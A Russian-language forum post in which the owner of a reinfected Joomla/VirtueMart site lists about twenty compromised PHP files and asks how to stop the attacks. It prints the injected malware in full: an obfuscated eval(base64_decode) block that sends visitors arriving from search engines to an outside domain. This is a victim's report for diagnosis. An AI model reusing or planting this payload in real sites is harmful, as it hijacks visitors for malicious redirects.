Столкнулись с бедой, постоянно заражают сайт вредоносным кодом, в частности файлы:
- /www/*****/www/htdocs/cache/_virtuemart/16083dce2beee5e30f58cf2d84f31c95-cache-_virtuemart-3218d6049f866249e464bfc607554bbd.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/cli/update_cron.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/index.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/libraries/import.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/libraries/loader.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/cache/convertECB/16083dce2beee5e30f58cf2d84f31c95-cache-convertECB-09d3a0d3006a432742cd856b547049a9.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/includes/framework.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/cache/_virtuemart/16083dce2beee5e30f58cf2d84f31c95-cache-_virtuemart-02053f2690cf1c95b17196b716ce92d3.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/includes/pathway.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/libraries/cms.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/includes/router.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/includes/menu.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/includes/defines.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/cli/finder_indexer.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/libraries/platform.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/cli/garbagecron.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/cache/_virtuemart/16083dce2beee5e30f58cf2d84f31c95-cache-_virtuemart-54b58ad6d59b13180c3397b9aabed354.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/includes/application.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
- /www/*****/www/htdocs/administrator/index.php => PHP.HostComm.#28463.evb64.0.UNOFFICIAL
Собственно код, который находится в заражённых файлах:
Код: |
<?
php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJN
U0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb2
0iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQu
bHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/
c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZW
FkZXIoIkxvY2F0aW9uOiBodHRwOi8vZG5zLWRucy5kbnMtZG5zLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));
|
Уже 3ий раз приходится из бэкапа подымать сайт. Как-то можно от этого защититься?
.htaccess проверял, левого кода нет..
Пароли меняли уже.
После замены ВСЕХ заражённых файлов на файлы из бэкапа (проверенные). Ошибка 500 продолжает вылазить. Поэтому приходится полностью восстанавливать из бэкапа. Используем Akeeba Backup
Ошибка 500 вылазит только в случае нажатия на "описание товара"...